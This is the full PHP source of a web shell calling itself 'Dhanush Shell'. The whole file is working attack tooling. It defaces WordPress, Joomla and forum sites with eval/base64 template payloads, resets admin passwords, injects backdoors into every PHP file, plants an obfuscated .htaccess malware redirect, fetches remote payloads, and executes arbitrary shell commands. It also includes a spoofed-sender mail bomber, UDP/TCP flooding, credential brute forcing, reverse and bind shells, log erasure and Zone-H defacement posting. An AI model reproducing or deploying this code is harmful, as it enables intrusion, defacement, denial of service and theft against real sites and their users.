$newpassword = md5($newpass); if($prefix == "" || $prefix == null) $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); else $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "joomla") { $newjoomlapass = $_GET['newjoomlapass']; $joomlauname = $_GET['username']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $newpassword = 
md5($newjoomlapass); if($prefix == "" || $prefix == null) $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'"); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } } else if(isset($_POST['forumdeface'])) { $localhost = $_POST['f1']; $database = $_POST['f2']; $username = $_POST['f3']; $password = $_POST['f4']; $index = $_POST['index']; $prefix = $_POST['tableprefix']; if($_POST['forumdeface'] == "vb") { $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); $index=str_replace('"','\\"',$index); $attack = "{\${eval(base64_decode(\'"; $attack .= base64_encode("echo \"$index\";"); $attack .= "\'))}}{\${exit()}}"; if($prefix == "" || $prefix == null) $query = "UPDATE template SET template = '$attack'"; else $query = "UPDATE ".$prefix."template SET template = '$attack'"; $result =@ mysql_query($query,$con); if($result) echo "
Vbulletin Forum Defaced Successfully
"; else echo "
Cannot Deface Vbulletin Forum
"; } else if($_POST['forumdeface'] == "mybb") { $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); $attack = "{\${eval(base64_decode(\'"; $attack .= base64_encode("echo \"$index\";"); $attack .= "\'))}}{\${exit()}}"; $attack = str_replace('"',"\\'",$attack); if($prefix == "" || $prefix == null) $query = "UPDATE mybb_templates SET template = '$attack'"; else $query = "UPDATE ".$prefix."templates SET template = '$attack'"; $result =@ mysql_query($query,$con); if($result) echo "
Mybb Forum Defaced Successfully
"; else echo "
Cannot Deface Mybb Forum
"; } else if($_POST['forumdeface'] == "smf") { $head = $_POST['head']; $catid = $_POST['f5']; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'"; else $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'"; $result =@ mysql_query($query,$con); if($result) echo "
SMF Forum Index Changed Successfully
"; else echo "
Cannot Deface SMF Forum
"; } else if($_POST['forumdeface'] == "ipb") { $head = $_POST['head']; $catid = $_POST['f5']; $IPB = "forums"; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'"); else $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'"); if($result) echo "
Forum Defaced Successfully
"; else echo "
Cannot Deface Forum
"; } else if($_POST['forumdeface'] == "wp") { $catid = $_POST['f5']; $head = $_POST['head']; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) { if(isset($_POST["alll"]) && $_POST["alll"] == "All") $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'"; else $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; } else { if(isset($_POST["alll"]) && $_POST["alll"] == "All") $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'"; else $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; } $result =@mysql_query($query,$con) or mysql_error(); if($result) echo "
Wordpress Defaced Successfully
"; else echo "
Cannot Deface Wordpress
"; } else if($_POST['forumdeface'] == "joomla") { $site_url = $_POST['siteurl']; $dbprefix = $_POST['tableprefix']; $dbname = $_POST['f2']; $h=""; function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } $co=randomt(); $link=mysql_connect($localhost,$username,$password) ; mysql_select_db($dbname,$link); $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); $req =mysql_query("SELECT * from `".$dbprefix."extensions` "); if ( $req ) { $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); $data = mysql_fetch_array($req); $template_id=$data["extension_id"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $return=entre2v2($buffer ,'[-] Login Error"); exit; } $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 
$useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); exit; } $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'
'); if($pos === false) { echo("
Cannot Deface Joomla
"); } else { echo("
Joomla Defaced Successfully
"); } } else { $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden=entre2v2($buffer ,'[-] Login Error"); exit; } $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); } $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'
'); if($pos === false) { echo("
Cannot Deface Joomla
"); exit; } else { echo("
Joomla Defaced Successfully
"); } } } } else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '') { $filetype = $_POST['filetype']; $mode = "a"; if($_POST['mode'] == 'Apender') $mode = "a"; if($_POST['mode'] == 'Overwriter') $mode = "w"; if (is_dir($_POST['pathtomass'])) { $lolinject = $_POST['injectthis']; $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype; if(substr($_POST['pathtomass'], -1) == "\\") $mypath = $_POST['pathtomass'] . "*.".$filetype; foreach (glob($mypath) as $injectj00) { if($injectj00 == __FILE__) continue; $fp=fopen($injectj00,$mode); if (fputs($fp,$lolinject)) echo '
'.$injectj00.' was injected
'; else echo 'failed to inject '.$injectj00.'
'; } } else echo ''.$_POST['pathtomass'].' is not available!'; } else if(isset($_POST['mailfunction'])) { if($_POST['mailfunction'] == "dobombing") { if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '') { $times = $_POST['times']; while($times--) { if(isset($_POST['padding'])) { $fromPadd = rand(0,9999); $subjectPadd = " -- ID : ".rand(0,9999999); $messagePadd = "\n\n------------------------------\n".rand(0,99999999); } $from = "president$fromPadd@whitehouse.gov"; if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from)) { $error = 1; echo "
Some Error Occured!
"; break; } } if($error != 1) echo "
Mail(s) Sent!
"; } } else if($_POST['mailfunction'] == "massmailing") { if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message'])) { if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from'])) echo "
Mail Sent!
"; else echo "
Some Error Occured!
"; } } } else if(isset($_POST['code'])) { if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true") { // FIlter Some Chars we dont need ?>
","",$code); // Evaluate PHP CoDE! ?>
Result of execution this PHP-code :
"; foreach (glob($_GET['path'] . "*.php") as $injectj00) { if($injectj00 == __FILE__) continue; if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00) { if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00) { if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } if($coun == 1) echo "
Done !!!!
"; else echo "
Cannot open files !!!!
"; } else if(isset($_GET['redirect'])) { if($myfile = fopen(".htaccess",'a')) { $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw"; fwrite($myfile, gzuncompress(base64_decode($mal))); fwrite($myfile, "\n\r"); fclose($myfile); echo "
Done !!!!
"; } else echo "
Cannot open file !!!!
"; } else if(isset($_GET['malware'])) { ?> ">
| Infect Users | | Redirect Search Engine TO Malwared site |

Cannot Open File!!
"; } else if(isset($_POST['getcode'])) { if($myfile = fopen(".htaccess",'a')) { fwrite($myfile, $_POST['getcode']); fwrite($myfile, "\n\r"); fclose($myfile); echo "Code Inserted Successfully!!!!"; } else echo "Permission Denied"; } else if(isset($_GET['uploadurl'])) { $functiontype = trim($_GET['functiontype']); $wurl = trim($_GET['wurl']); $path = magicboom($_GET['path']); function remotedownload($cmd,$url) { $namafile = basename($url); switch($cmd) { case 'wwget': execmd(which('wget')." ".$url." -O ".$namafile); break; case 'wlynx': execmd(which('lynx')." -source ".$url." > ".$namafile); break; case 'wfread' : execmd($wurl,$namafile); break; case 'wfetch' : execmd(which('fetch')." -o ".$namafile." -p ".$url); break; case 'wlinks' : execmd(which('links')." -source ".$url." > ".$namafile); break; case 'wget' : execmd(which('GET')." ".$url." > ".$namafile); break; case 'wcurl' : execmd(which('curl')." ".$url." -o ".$namafile); break; default: break; } return $namafile; } $namafile = remotedownload($functiontype,$wurl); $fullpath = $path . $directorysperator . $namafile; if(is_file($fullpath)) { echo "
File uploaded to $fullpath
"; } else echo "
Failed to upload $namafile
"; } else if(isset($_GET['createfolder'])) { if(!mkdir($_GET['createfolder'])) echo "Failed To create"; else echo "Folder Created Successfully"; } else if(isset($_GET['selfkill'])) { if(unlink(__FILE__)) echo "
Good Bye......
"; else echo "
Shell cannot be removed......
"; } else if(isset($_GET['Create'])) { ?>

File Created Successfully"; } else echo "Cannot Create File"; } else if(isset($_REQUEST["defaceforum"])) { ?>
Forum Index Changer
Host : Database :
User : Password : 
Type : Prefix :

 

"; ?>
Forum Password Changer
Host :   DataBase :
 User : Password : 
Type : Prefix :

User ID :  New Password :

= $maxTime) { break; } } echo "Dos Completed!
"; echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."
"; echo "Total Number of Packets Sent : " . $packets . "
"; echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "
"; echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "
"; } } else if(isset($_GET['fuzzer'])) { if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "") { $IP=$_GET['ip']; $port=$_GET['port']; $times = $_GET['exTime']; $timeout = $_GET['timeout']; $send = 0; $ending = ""; $multiplier = $_GET['multiplier']; $data = ""; $mode="tcp"; $data .= "GET /"; $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r"; if($_GET['type'] == "tcp") { $mode = "tcp"; } while($multiplier--) { $data .= urlencode($_GET['no0fBytes']); } $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers $data .= "by-Dhanush".$ending; $length = strlen($data); echo "Sending Data :-

$data

"; for($i=0;$i<$times;$i++) { $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); if($socket) { fwrite($socket , $data , $length ); fclose($socket); } } echo "Fuzzing Completed!
"; echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
"; echo "Total Number of Packets Sent : " . $times . "
"; echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "
"; echo "Data per packet = " . HumanReadableFilesize($length) . "
"; } } else if(isset($_GET['bypassit'])) { if(isset($_GET['copy'])) { if(@copy($_GET['copy'],"test1.php")) { $fh=fopen("test1.php",'r'); echo "

"; @fclose($fh); unlink("test1.php"); } } else if(isset($_GET['imap'])) { $string = $_GET['imap']; echo ""; } else if(isset($_GET['sql'])) { echo ""; } else if(isset($_GET['curl'])) { $ch=curl_init("file://" . $_GET[curl]); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

"; } else if(isset($_GET['include'])) { if(file_exists($_GET['include'])) { echo ""; } else echo "
Can't Read" . $_GET['include'] . "
"; } else if(isset($_GET['id'])) { echo ""; break; } else if(isset($_GET['tempnam'])) { $mytmp = tempnam ( 'tmp', $_GET['tempnam'] ); $fp = fopen ( $mytmp, 'r' ); while(!feof($fp)) echo fgets($fp); fclose ( $fp ); } else if(isset($_GET['symlnk'])) { echo ""; } if(isset($_GET['newtype'])) { $filename = $_GET['newtype']; echo ""; } } // Deface Website else if(isset($_GET['deface'])) { $myfile = fopen($_GET['deface'],'w'); if(fwrite($myfile, base64_decode($ind))) {fclose($myfile); echo "Index Defaced Successfully";} else echo "Donot have write permission"; } else if(isset($_GET['perms'])) { ?>
Change Permissions
=0;--$i) $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1)); if(@chmod($_GET['myfilename'],$perms)) echo "
File Permissions Changed Successfully
"; else echo "
Cannot Change File Permissions
"; } } else if(isset($_GET['rename'])) { ?>
File
To
File Renamed Successfully
"; } } else if(isset($_GET['open'])) { if(is_file($_GET['myfilepath'])) { $owner = "0/0"; if($os == "Linux") $owner = getOGid($_GET['myfilepath']); ?>
File : Permissions :
Size : Owner/Group :

File Saved Successfully!
"; else echo "Cannot Write into File"; } else { echo "File Name Specified does not exists!"; } } else if(isset($_POST["SendNowToZoneH"])) { $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)) { die("
[-] You Must Fill the Attacker name !
"); } elseif($method == "--------SELECT--------") { die("
[-] You Must Select The Method !
"); } elseif($neden == "--------SELECT--------") { die("
[-] You Must Select The Reason
"); } elseif(empty($site)) { die("
[-] You Must Inter the Sites List !
"); } // Zone-h Poster function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } $i = 0; $sites = explode("\n", $site); echo "
";
	// Submission loop over $sites, the POSTed 'domain' value split on "\n" just above.
	// Entries that do not begin with "http" get "http://" prepended before they are used.
	// NOTE(review): detection angle. ZoneH(), defined earlier in this branch, sends one
	// cURL POST per entry, so this loop appears as repeated outbound HTTP requests from
	// the PHP worker to zone-h.org/notify/single. Egress to that URL from a web server
	// process is a useful network indicator for this routine.
	while($i < count($sites)) 
	{
		// Only the first four characters are compared, so any "http..." prefix is kept as-is.
		if(substr($sites[$i], 0, 4) != "http") 
		{
				$sites[$i] = "http://".$sites[$i];
		}
		// One request per entry; the value returned by ZoneH() is discarded here.
		ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
		echo "Site : ".$sites[$i]." Posted !
"; ++$i; } echo "Sending Sites To Zone-H Has Been Completed Successfully !!
"; } else if(isset($_GET['executemycmd'])) { $comm = $_GET['executemycmd']; chdir($_GET['executepath']); echo shell_exec($comm); } // View Passwd file else if(isset($_GET['passwd'])) { $test=''; $tempp= tempnam($test, "cx"); $get = "/etc/passwd"; $name=@posix_getpwuid(@fileowner($get)); $group=@posix_getgrgid(@filegroup($get)); $owner = $name['name']. " / ". $group['name']; ?>
File : Permissions :
Size : Owner/Group :

"; unlink($tempp); } else { ?>
From :
To :

$get
"; unlink($tempp); } } else if(isset($_GET['bomb'])) { ?>
To
Subject
No. of Times
Pad your message (Less spam detection)
From
To
Subject
| Get Domains | | Symlink Server | | Symlink File | | Script Locator |

| Forum Defacer | | Forum Password Changer |


Server security information

Curl Oracle MySQL MSSQL PostgreSQL Open Base Directory Safe_Exec_Dir PHP Version Magic Quotes Server Admin
NONE";}else {echo "$df";};} ?>

Directory
Mode
File Type
Create A backdoor by injecting this code in every php file of current directory
Safe mode bypass

Using copy() function

Using imap() function

Using sql() function

Using Curl() function

Bypass using include()

Using id() function

Using tempnam() function

Using symlink() function

Using Bypass function

IP
Port
Timeout
No of times
Message (The message Should be long and it will be multiplied with the value after it) x
PHP CURL NOT EXIST
"; } ?>
Zone-h Poster
IP
Port
Timeout (Time in seconds)
Execution Time (Time in seconds)
No of Bytes per/packet
| Mail Bomber | | Mass Mailer |


Port Scanner

BruteForce
Type :
Server : Port : " class="sbox">
Brute type :

Login :        
Dictionary :



Select Website


Reverse Shell Bind Shell
IP
Port
Use:   
Port
Password
Using   
Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!
Click "Bind", use netcat and give it the command 'nc 9891"!
| Set Your 404 Page | | Set Specified 404 Page |

D h a n u s h
[--==Coded By Arjun==--]


       -  --  -
       -- -- --
       --    --
       ---  ---
       ------
       ----
   ----             
 ------           
-------          
---   --          
      --      --- 
      --      ----- 
     ---      --- --- 
     ---    ---   ---
--   ---------     --
--    -------      --
 --     ----       --
  --     ---       --
  --     --        --
   ---  ---   --  ---
    ------    ------
     ----      ----
      

		
Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it


GREETZ To All Indian Hackers
| जय महाकाल | | जय हिन्द |

Connect To Database
Server Address :
Username :
Password:
Target :
User namesPassword
Guess options :
Timeout delay :
">
| Malware Attack | | Insert Own Code |

"; ob_start(); eval("phpinfo();"); $b = ob_get_contents(); ob_end_clean(); $a = strpos($b,"")+6; // yeah baby,, your body is wonderland ;-) $z = strpos($b,""); $s_result = "
".substr($b,$a,$z-$a)."
"; echo $s_result; } else if(isset($_GET['execute'])) { $comm = $_GET['execute']; chdir($_GET['executepath']); $check = shell_exec($comm); echo "
"; ?>

Logs Cleared
"; } } else { if($openp = fopen("/tmp/logseraser.pl", 'w')) { fwrite($openp, $erase)or die("Error"); fclose($openp); $aidx = passthru("perl logseraser.pl linux"); unlink("logseraser.pl"); echo "
Logs Cleared
"; } } } else { $check = shell_exec($_GET['mycmd']); echo "
"; } } else if(isset($_GET['prototype'])) { echo '

Results

Type: '.htmlspecialchars($_GET['prototype']).'
Server:
'.htmlspecialchars($_GET['serverport']).'
'; if( $_GET['prototype'] == 'ftp' ) { function BruteFun($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_GET['prototype'] == 'mysql' ) { function BruteFun($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_GET['prototype'] == 'pgsql' ) { function BruteFun($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_GET['server']); if($_GET['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp)) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_GET['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_GET['type'] == 2) { $temp = @file($_GET['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if(BruteFun($server[0],@$server[1], $_GET['login'], $line) ) { $success++; echo ''.htmlspecialchars($_GET['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success
"; } // Execute Query else if(isset($_GET["executeit"])) { if(isset($_GET['username']) && isset($_GET['server'])) { $dbserver = $_GET['server']; $dbuser = $_GET['username']; $dbpass = $_GET['password']; if(mysql_connect($dbserver,$dbuser,$dbpass)) { setcookie("dbserver", $dbserver); setcookie("dbuser", $dbuser); setcookie("dbpass", $dbpass); listdatabase(); } else echo "cannotconnect"; } } else if(isset($_GET['action']) && isset($_GET['dbname'])) { if($_GET['action'] == "createDB") { $dbname = $_GET['dbname']; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); mysql_query("create database $dbname",$mysqlHandle); listdatabase(); } if($_GET['action'] == 'dropDB') { $dbname = $_GET['dbname']; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); mysql_query("drop database $dbname",$mysqlHandle); mysql_close($mysqlHandle); listdatabase(); } if($_GET['action'] == 'listTables') { listtable(); } // Create Tables if($_GET['action'] == "createtable") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("CREATE TABLE $tablename ( no INT )"); listtable(); } // Drop Tables if($_GET['action'] == "dropTable") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("drop table $tablename"); listtable(); } // Empty Tables if($_GET['action'] == "empty") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = 
$_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("delete from $tablename"); listtable(); } // Empty Tables if($_GET['action'] == "dropField") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $fieldname = $_GET['fieldname']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; mysql_select_db( $dbname, $mysqlHandle ); mysql_query( $queryStr , $mysqlHandle ); listtable(); } if($_GET['action'] == 'viewdb') { listdatabase(); } // View Table Schema if($_GET['action'] == "viewSchema") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); echo "
"; $pResult = mysql_query( "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); echo "

"; echo ""; for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; $fieldname = $field["Field"]; echo "\n"; echo "\n"; } echo "
FieldTypeNullKey
".$field["Field"]."".$field["Type"]."".$field["Null"]."".$field["Key"]."".$field["Default"]."".$field["Extra"]."Drop
"; echo ""; } // Execute Query if($_GET['action'] == "executequery") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $result = mysql_query($_GET['executemyquery']); // results echo "\r\n". strtoupper($_GET['executemyquery']) . "
\r\n\r\n"; $count = 0; while ($row = mysql_fetch_assoc($result)) { echo "\r\n"; if ($count==0) // list column names { echo "\r\n"; while($key = key($row)) { echo "\r\n"; next($row); } echo "\r\n"; } foreach($row as $r) // list content of column names { if ($r=='') $r = 'NULL'; echo "\r\n"; } echo "\r\n"; $count++; } echo "
" . $key . "
" . $r . "
